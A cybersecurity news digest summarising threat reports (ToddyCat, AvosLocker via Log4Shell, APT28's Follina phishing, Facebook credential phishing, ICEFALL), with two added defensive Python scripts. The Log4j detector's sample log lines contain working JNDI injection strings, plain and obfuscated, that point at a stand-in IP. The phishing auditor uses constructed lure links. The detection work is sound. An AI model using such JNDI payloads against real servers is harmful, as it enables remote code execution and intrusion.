Daily Drop (171)
China-Linked ToddyCat APT Pioneers Novel Spyware
FROM THE MEDIA: A threat group that may have been among the first to exploit the ProxyLogon zero-day vulnerability in Exchange Servers last year is using a pair of dangerous and previously unseen malware tools in a cyber espionage campaign targeting military and government organizations in Europe and Asia.
Researchers at Kaspersky who first detected the group's activities this week described the tools as malware designed to enable long-term persistence on an organization's public-facing Web servers and giving attackers the ability to move laterally and penetrate deeply into compromised networks.
The malware tools have features that allow their functionality to be extended at will, but Kaspersky has been unable so far to determine the full range of their capabilities, the vendor noted.
READ THE STORY: DarkReading
AvosLocker Ransomware Deployed in Log4Shell Attack
FROM THE MEDIA: The month-long ransomware attack, which impacted an unnamed company, targeted instances of the VMware Horizon Unified Access Gateway that were vulnerable to the Log4j flaw. The attacker first exploited the series of Apache Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832) that can allow remote code execution on vulnerable Unified Access Gateways, with the resulting code running as the low-privilege non-root 'gateway' user. Threat actors used a newer variant of AvosLocker, first seen earlier this year, which targets Linux environments in addition to Windows machines; the attack, coupled with these recent changes, demonstrates that AvosLocker is "likely to proliferate in the future," said Cisco Talos researchers in a Tuesday analysis.
"In the current ransomware cartel landscape [this recent attack] could be either an affiliate using their own TTPs or a new behavior that has been provided as part of the procedures provided by the cartel," said Guilherme Venere, researcher with Cisco Talos. "We commonly see these groups start leveraging new vulnerabilities in their attacks, for instance."
READ THE STORY: DUO
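The Log4Shell item above says the attacker got in through Log4j lookups on an internet-facing gateway. The first check a responder wants on such a host is whether JNDI lookup strings ever reached it. The following Python triage filter is an added example, not code from the Talos analysis or from this page: it runs over constructed access-log lines (the IPs, paths and User-Agent values are made up for illustration) and reports lines containing a `${jndi:...}` lookup, including the nested `${lower:...}` and `${::-x}` default-value tricks attackers used to defeat naive string matching.

```python
import re

# Constructed sample access-log lines (not from the Talos report). The last quoted
# field is the request User-Agent. Lines 0-2 carry a JNDI lookup in plain and in
# two obfuscated forms; lines 3-4 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.9/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/o}"',
    '10.0.0.8 - - "GET /portal/ HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.68.0"',
]

# Innermost lookups attackers nest to hide the literal "jndi": ${lower:X}/${upper:X}
# evaluate to X in that case, and ${key:-X} (including the empty-key form ${::-X})
# evaluates to the default X when the key is unset.
OBFUSCATING_LOOKUP = re.compile(
    r"\$\{(?P<case>lower|upper):(?P<arg>[^${}]*)\}"
    r"|\$\{[^${}]*:-(?P<default>[^${}]*)\}",
    re.IGNORECASE,
)

# After normalisation a JNDI lookup reads ${jndi:<scheme>:...}; the scheme is the
# protocol the vulnerable host would use to fetch the attacker's object (ldap, rmi, dns...).
JNDI_LOOKUP = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):", re.IGNORECASE)


def normalize_lookups(text, max_rounds=10):
    """Collapse nested case/default lookups from the inside out, mirroring how
    Log4j would evaluate them, so the detector sees the de-obfuscated string."""
    def resolve(m):
        if m.group("case"):
            arg = m.group("arg")
            return arg.lower() if m.group("case").lower() == "lower" else arg.upper()
        return m.group("default")

    for _ in range(max_rounds):  # bounded so pathological input cannot loop forever
        collapsed = OBFUSCATING_LOOKUP.sub(resolve, text)
        if collapsed == text:
            return text
        text = collapsed
    return text


def scan_log_lines(lines):
    """Return one finding per line that contains a JNDI lookup after normalisation."""
    findings = []
    for index, line in enumerate(lines):
        normalized = normalize_lookups(line)
        m = JNDI_LOOKUP.search(normalized)
        if m:
            findings.append({
                "line": index,
                "scheme": m.group("scheme").lower(),
                "normalized": normalized,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOGS):
        print(f"line {f['line']}: jndi via {f['scheme']} -> {f['normalized']}")
```

This is a triage filter, not proof of compromise: it only sees requests the server actually logged, it collapses only the lower/upper/default lookups (other lookups such as `${env:...}` or `${sys:...}` can be nested the same way), and a hit means a payload arrived, not that the JNDI fetch succeeded. A confirmed hit on a host like the gateway in the story should be followed by checking what ran as that low-privilege user.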
Russian govt hackers hit Ukraine with Cobalt Strike, CredoMap malware
FROM THE MEDIA: The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.
The APT28 hacking group is believed to be sending emails containing a malicious document named "Nuclear Terrorism A Very Real Threat.rtf". The threat actors selected the topic of this email to entice recipients to open it, exploiting the fear that has spread among Ukrainians about a potential nuclear attack.
Threat actors also used a similar tactic in May 2022, when CERT-UA identified the dissemination of malicious documents warning about a chemical attack.
READ THE STORY: Bleeping Computer
These fake voicemail phishing emails want to steal your passwords
FROM THE MEDIA: Criminals are targeting people in US military and tech organizations with so-called "vishing" lures: emails whose supposed links to a voicemail dupe victims into revealing credentials for Microsoft Office 365 and Outlook email accounts.
Vishing isn't a new threat: the FBI raised an alarm about it in mid-2020 but it was spotlighted by Interpol this week as a growing threat when it announced arrests of 2,000 people accused of online fraud, including the lucrative category of business email compromise (BEC).
According to US security firm Zscaler, there has been a resurgence in vishing since May that's targeting employees in software security, US military, security solution providers, healthcare and pharmaceutical, and the manufacturing supply chain.
READ THE STORY: ZDNET
Okta says Lapsus$ incident was actually a brilliant zero trust demonstration
FROM THE MEDIA: Okta has completed its analysis of the March 2022 incident that saw the Lapsus$ extortion crew get a glimpse of some customer information, and concluded that its implementation of zero trust techniques foiled the attack – and that its (former) outsourced customer service provider Sitel was largely to blame for the confusion surrounding the incident.
So said Brett Winterford, Asia-Pacific and Japan chief security officer of the identity-management-as-a-service vendor, at the Gartner Risk and Security Summit in Sydney today.
READ THE STORY: The Register
How Russia’s vaunted cyber capabilities were frustrated in Ukraine
FROM THE MEDIA: A quiet partnership of the world’s biggest technology companies, U.S. and NATO intelligence agencies, and Ukraine’s own nimble army of hackers has pulled off one of the surprises of the war with Russia, largely foiling the Kremlin’s brazen internet hacking operations.
Russia’s cyber-reversals haven’t resulted from lack of trying. Microsoft counts nearly 40 Russian destructive attacks between Feb. 23 and April 8, and Rob Joyce, the National Security Agency’s cybersecurity director, said the Russians had attempted an “enormous” cyber offensive. The Russians sabotaged a satellite communications network called Viasat in the opening days of the war, for example, with the damage spilling over into other European countries.
READ THE STORY: WP
Did Russian hackers blow up a Texas LNG pipeline on June 8?
FROM THE MEDIA: According to two sources, around the time of Russia's late February invasion of Ukraine, a cyber unit of Russia's GRU military intelligence service again conducted targeting-reconnaissance operations against a major U.S. liquefied natural gas exporter, Freeport LNG.
U.S. LNG exports have long been a priority concern for Russia, viewed by Russian President Vladimir Putin as a means for the United States to undercut Russia's domination of the European gas market.
On June 8, Freeport LNG suffered an explosion at its liquefaction plant and export terminal on Texas's Quintana Island. The damage suffered means the facility is not expected to resume major operations until late 2022. The June 8 disruption had an immediate impact in spiking already soaring European gas prices and has reinforced Russia's ability to hold gas supplies to Europe at risk in retaliation for the European Union sanctions imposed on Russia over the war in Ukraine. U.S. LNG futures have fallen significantly since the explosion.
READ THE STORY: Washington Examiner
Siemens, Motorola, Honeywell and more affected by 56 ‘ICEFALL’ vulnerabilities
FROM THE MEDIA: Security researchers have discovered 56 new vulnerabilities – collectively known as “ICEFALL” – that affect several of the largest operational technology (OT) equipment manufacturers supplying critical infrastructure organizations.
The vulnerabilities affect Siemens, Motorola, Honeywell, Yokogawa, ProConOS, Emerson, Phoenix Contact, Bentley Nevada, Omron and JTEKT. Discovered by researchers with Forescout, the 56 vulnerabilities were disclosed in coordination with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other government agencies around the world.
The vulnerabilities are broken down into four general categories: Insecure engineering protocols, weak cryptography or broken authentication schemes, insecure firmware updates and remote code execution via native functionality.
READ THE STORY: The Record
China's Increasing U.S. Cyber Espionage Allegations Support Its Internet Governance Aspirations
FROM THE MEDIA: Recently, Chinese media has published articles about a report provided by Burmese-based Anzer, a cybersecurity company, that detailed alleged efforts by U.S. military and government agencies to remotely steal more than 97 billion pieces of global Internet data and 124 billion phone records in the last 30 days. The report specifically details the suspected involvement of the National Security Agency's Tailored Access Operations (TAO), an elite cyber group believed to be behind some of the United States' more surreptitious cyber activity. Anzer's report supposedly revealed another weapon platform – "boundless informant" – a tool that allows for big-data summary analysis and visualization. At this time, attempts to acquire this report have not been successful; information pertaining to it has been made available only through news sources, many of them English versions of Chinese outlets, and it was even mentioned in remarks by China's Foreign Ministry spokesman at a press conference.
READ THE STORY: OODALOOP
One Million Facebook Credentials Compromised in Four Months by Ongoing Phishing Campaign
FROM THE MEDIA: Facebook credentials are being stolen at an alarming clip by a large scale phishing campaign, according to anti-phishing platform Pixm. Security researchers with the company have documented a credential harvesting campaign that has been active since late 2021, and has been highly successful in duping victims using an authentic-looking spoofed Facebook login page. The attacker makes use of links that appear to go to videos hosted on Facebook, and that ask for user Facebook credentials to display the video.
The first tip-off to the phishing campaign was the discovery of a fake Facebook login portal by a Pixm subscriber in September 2021. The same portal page continues to be used today; it closely resembles a standard login page, but asks the viewer (in red text across the top of the page) to enter their Facebook credentials to be allowed access to a video.
READ THE STORY: CPO MAG
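Both the voicemail lure above and this Facebook campaign rely on the same trick: a link whose displayed text or hostname suggests a trusted brand while the credential page lives on a domain the attacker controls. As an added example (not code from Pixm, Zscaler or this page), the Python script below parses a constructed HTML message body, pairs each link's visible text with its real destination, and flags links where the displayed URL differs from the real host, where a brand name is used as a subdomain of an unrelated domain, or where the link text names a brand the destination does not belong to. The allow-list of brand domains, the sample message and the `.example` hostnames are assumptions for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message body (not from either report): a "voicemail" link that displays a
# Microsoft URL but points elsewhere, a "Facebook video" link whose hostname merely
# starts with facebook.com, and one genuine Facebook link for comparison.
SAMPLE_EMAIL_HTML = """
<p>You have a new voicemail (0:37).</p>
<a href="https://login-microsoftonline.example/vm">https://login.microsoftonline.com/voicemail</a>
<p>Someone tagged you in a video.</p>
<a href="https://facebook.com.watch-video.example/login">Watch the Facebook video</a>
<p>Legitimate:</p>
<a href="https://www.facebook.com/watch/?v=1">Watch on Facebook</a>
"""

# Assumed allow-list of domains the brands actually use; extend per organisation.
BRAND_DOMAINS = {"facebook.com", "microsoft.com", "microsoftonline.com", "office.com", "outlook.com"}
BRAND_WORDS = sorted({d.split(".")[0] for d in BRAND_DOMAINS})

# Link text that is itself a URL (with or without a scheme); group 1 is its host.
URL_LIKE = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(?:[/?#]\S*)?$", re.IGNORECASE)


def registrable(host):
    """Last two labels of a hostname. Simplification: no public-suffix list, so a
    host such as brand.co.uk reduces to co.uk; enough to expose brand-prefix hosts."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def audit_link(href, text):
    """Reasons a link looks like a credential-harvesting lure; empty list if none."""
    host = (urlparse(href).hostname or "").lower()
    dest = registrable(host)
    reasons = []
    # 1. The displayed URL's host is not where the link really goes.
    m = URL_LIKE.match(text)
    if m and registrable(m.group(1)) != dest:
        reasons.append(f"displayed host {m.group(1).lower()!r} differs from actual host {host!r}")
    if dest not in BRAND_DOMAINS:
        # 2. A brand name appears in the hostname of an unrelated domain.
        in_host = [w for w in BRAND_WORDS if w in host]
        if in_host:
            reasons.append(f"brand word(s) {in_host} in host {host!r}, but the domain is {dest!r}")
        # 3. The link text names a brand the destination does not belong to.
        in_text = [w for w in BRAND_WORDS if w in text.lower()]
        if in_text:
            reasons.append(f"link text names {in_text} but the destination is {dest!r}")
    return reasons


def audit_html(body):
    """Return [(href, reasons)] for every flagged link in an HTML body."""
    parser = LinkCollector()
    parser.feed(body)
    flagged = []
    for href, text in parser.links:
        reasons = audit_link(href, text)
        if reasons:
            flagged.append((href, reasons))
    return flagged


if __name__ == "__main__":
    for href, reasons in audit_html(SAMPLE_EMAIL_HTML):
        print(href)
        for reason in reasons:
            print("  -", reason)
```

The check is deliberately conservative: it never flags a link whose registrable domain is on the allow-list, so the genuine Facebook link passes while both lures are reported. It does not follow redirects, so a lure that bounces through a legitimate-looking shortener or an open redirect on a trusted domain would still need the landing page inspected, which is the pattern the Pixm report describes when the spoofed login is reached through a chain of links.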
With Artificial Intelligence, Short-Term Risk Aversion Is Long-Term Risk Seeking
FROM THE MEDIA: On November 27, 2020, Iran’s top nuclear scientist was assassinated. The initial accounts differed wildly, and it took roughly ten months for the New York Times to break the real story. In prose that could have come from a sci-fi novel, the world learned that Israeli intelligence operatives had carried out the assassination with “a high-tech, computerized sharpshooter [rifle] kitted out with artificial intelligence and multiple-camera eyes, operated via satellite and capable of firing 600 rounds a minute.”
A more salient, tactical manifestation of autonomous capabilities is drone warfare. Particularly lethal is the American-made, multipurpose, loitering munition Altius 600 that has a range of 276 miles and can operate at a ceiling of twenty-five thousand feet, providing intelligence, surveillance, and reconnaissance, counter–unmanned aircraft systems effects, and precision-strike capabilities against ground targets. Many systems like the Altius “will use artificial intelligence to operate with increasing autonomy in the coming years.”
But AI-enabled weapons systems are already being used for lethal targeting—for example, the Israeli-made Orbiter 1K unmanned aircraft system, a loitering munition recently used by the Azerbaijani military in the Second Nagorno-Karabakh War, independently scans an area and automatically detects and destroys stationary or moving targets kamikaze-style. If the Orbiter 1K does not observe a target right away, it will loiter above the battlespace and wait until it does. As two instances of AI-augmented, autonomous weapons being used to kill remotely, the assassination and the drone warfare of the Second Nagorno-Karabakh War draw attention to longstanding concerns about AI-enabled machines and warfare.
READ THE STORY: MWI
Political Games Empower Russian Cyberattacks
FROM THE MEDIA: The United States faces an alarming and growing threat of cyberattacks from Russia. Some in Congress would compound these dangers by enacting legislation that would force America’s leading tech companies to allow access to their software, hardware and operating systems to customers and competitors in the U.S. and overseas.
The Cybersecurity and Infrastructure Security Agency (CISA) has been blunt about Russia.
“The Russian government engages in malicious cyber activities to enable broad-scope cyber espionage, to suppress certain social and political activity, to steal intellectual property, and to harm regional and international adversaries,” CISA says on its website.
During a “60 Minutes” interview on April 17, CISA director Jen Easterly said: “We are seeing evolving intelligence about Russia planning for potential attacks. And we have to assume that there’s going to be a breach. There’s going to be an incident. There’s going to be an attack.”
Last year, a ransomware attack on the Colonial Pipeline, thought to have been done by criminals in Russia but not the Russian government itself, caused widespread disruption even though it lasted just a few days. Coordinated, sustained attacks from Russia’s government would impose exponentially more harm.
READ THE STORY: Inside Sources
Bots are Twitter's Problem and Not China, Says Elon Musk
FROM THE MEDIA: Before he could complete his $44 billion takeover of Twitter Inc., Chief Executive Officer Elon Musk noted that the social media platform has several issues that must be resolved. These include obtaining a precise measure of how many bots the platform has and finalizing the funding for the deal.
In an interview with Bloomberg News Editor-in-Chief John Micklethwait at the Qatar Economic Forum in Doha, Musk said that the ratio of fake, spam and bot accounts on the platform is a very significant matter. Banks have already committed $13 billion of debt financing to Elon Musk's acquisition; the lenders include Morgan Stanley, Bank of America Corp., and Barclays Plc.
Musk has repeatedly asked Twitter for fake-account disclosures since agreeing to the deal, fueling speculation that he might want to cut the deal's price or walk away. The SpaceX CEO's lawyer also said that Twitter must cooperate fully by providing the data Musk has requested so that he can secure the debt financing that is critical to closing the deal.
READ THE STORY: ITech Post
A Perspective on Russian Cyberattacks and Disinformation
FROM THE MEDIA: Glenn Gerstell, former general counsel of the National Security Agency, said it is very hard to use cyberattacks to produce "a strategic or enduring effect." Generally, attacks result in transient effects such as stopping a server from working properly or stealing information, which can be damaging, but victims can recover from these setbacks relatively quickly. Using cyberattacks in certain circumstances can however achieve a more strategic effect. Attacks on operational technology to knock out electricity grids or telephone and internet infrastructure can be highly damaging, for example, but such attacks take a lot of planning and are difficult to execute at scale.
Another way to achieve a strategic impact is to couple cyberattacks with disinformation. According to Mr. Gerstell, alongside the attacks on Ukrainian banks and ATMs, Russia sent text messages to citizens in some of the eastern cities, telling them they wouldn’t be able to withdraw money. “What else do you need to do to cause panic?” he said.
READ THE STORY: WSJ
‘Everything’ in app popular with US troops is ‘seen in China,’ new report says
FROM THE MEDIA: TikTok has grown in popularity among U.S. service members as a place to share the highs and lows of military service, but it has remained a concern for the Pentagon because of its ties to China. And a recent news article based on leaked audio recordings shows why.
Records first reported by BuzzFeed News reveal more than a dozen statements from TikTok employees saying engineers in China “had access to U.S. data between September 2021 and January 2022, at the very least.” TikTok’s parent company is ByteDance, a Chinese company based in Beijing. And despite TikTok claiming that U.S. user data is safe, evidence collected by BuzzFeed News shows otherwise.
READ THE STORY: Task and Purpose
Cyber options may grow more attractive to Russia as kinetic operations stall
FROM THE MEDIA: Reuters reports that US Deputy Treasury Secretary Wally Adeyemo warned the Bank Policy Institute last week that the threat of Russian cyberattack remained high. The Treasury Department reiterated its "commitment to sharing appropriate intelligence and fostering an ongoing, real-time dialogue with financial institutions about threats as they arise."
Tanium's Teddra Burgess argues, in an essay published Friday by SC Media, that Russia's war against Ukraine represents a template for future, broader, cyber operations in other hybrid wars. She stresses the threat of both supply chain attacks and the disruption of critical infrastructure. She also argues that assessing that threat requires an understanding of the role criminal groups play in a hybrid war: "These most recent developments point to a concerning trend because of the escalation and atypical behavior displayed by established hacker groups, there’s potentially a power struggle in play after Russia’s invasion of Ukraine. This might explain the change in extortion patterns in an attempt to accumulate larger amounts of ill-gotten gain. As a result, we can expect to see this activity at the very least continue as we work to keep pace with the evolving attack surface."
READ THE STORY: The CyberWire
Tencent's WeChat wants no more talk of cryptocurrency and NFTs
FROM THE MEDIA: China's ban on cryptocurrency mining – and general dislike of any form of blockchain-based assets – has seen web giant Tencent clamp down on discussion of the subjects on its massive WeChat and Weixin messaging platforms.
News of Tencent's policy can be found in recent amendments to its terms of service which last week added a section about cryptocurrency and NFTs.
The added verbiage states that accounts engaged in discussion of crypto trading, exchange between bit-bucks and real money, or provision of pricing services for digital currencies, all need to stop it.
Account holders whose chats veer into the topics described above will be warned, and Tencent may restrict some functions of their accounts.
READ THE STORY: The Register
Microsoft pulls Windows 10/11 installation websites in Russia
FROM THE MEDIA: Microsoft has blocked the installation of Windows 10 and 11 in Russia from the company's official website, Russian state media reported on Sunday. Users within the country confirmed that attempts to download Windows 10 resulted in a 404 error message.
TASS reported that attempts to download a Windows 11 disk image (ISO) were diverted to a Microsoft Support contact page. The software is available, however, with a virtual private network (VPN) to disguise a computer's location – as are many other online resources.
Demand for VPNs reportedly rose by an unprecedented 2,692 percent in Russia as Instagram, Facebook, and Twitter became unavailable from within the country.
READ THE STORY: The Register
Items of interest
NASA tricks Artemis launch computer by masking data showing a leak
FROM THE MEDIA: NASA engineers had to work fast to avoid another leak affecting the latest Artemis dry run, just hours after an attempt to reboost the International Space Station (ISS) via the Cygnus freighter was aborted following a few short seconds.
The US space agency on Monday rolled the huge Artemis I stack back to its Florida launchpad having worked through the leaks and problems that had beset its previous attempt at fueling the beast in April for an earlier dress rehearsal of the final countdown.
As propellant was loaded into the rocket, controllers noted a hydrogen leak in the quick-disconnect that attaches an umbilical from the tail service mast on the mobile launcher to the core stage of the rocket.
Such a leak would normally trigger a hold in an actual launch. When warming the disconnect then chilling it again to align the seal did not work, the team "developed a plan to mask data associated with the leak," according to NASA. The "mask" – which prevented the data from triggering a hard stop by the ground launch computer – allowed tests to proceed.
READ THE STORY: The Register
Identify a location from a photo or video (geolocation) (Video)
FROM THE MEDIA: This tutorial is part 4 of the OSINT At Home series. It covers how to identify a location from a photo or video using Google Maps – also referred to as geolocation.
Using mountains to geolocate a photo or video (Video)
FROM THE MEDIA: The tutorial is an explainer of how to use mountain ranges and ridge-lines to geolocate a photo or video, specifically using the 3D mountains visible in Google Earth to identify the location of photos and videos.
About this Product
These open source products are reviewed by analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at email@example.com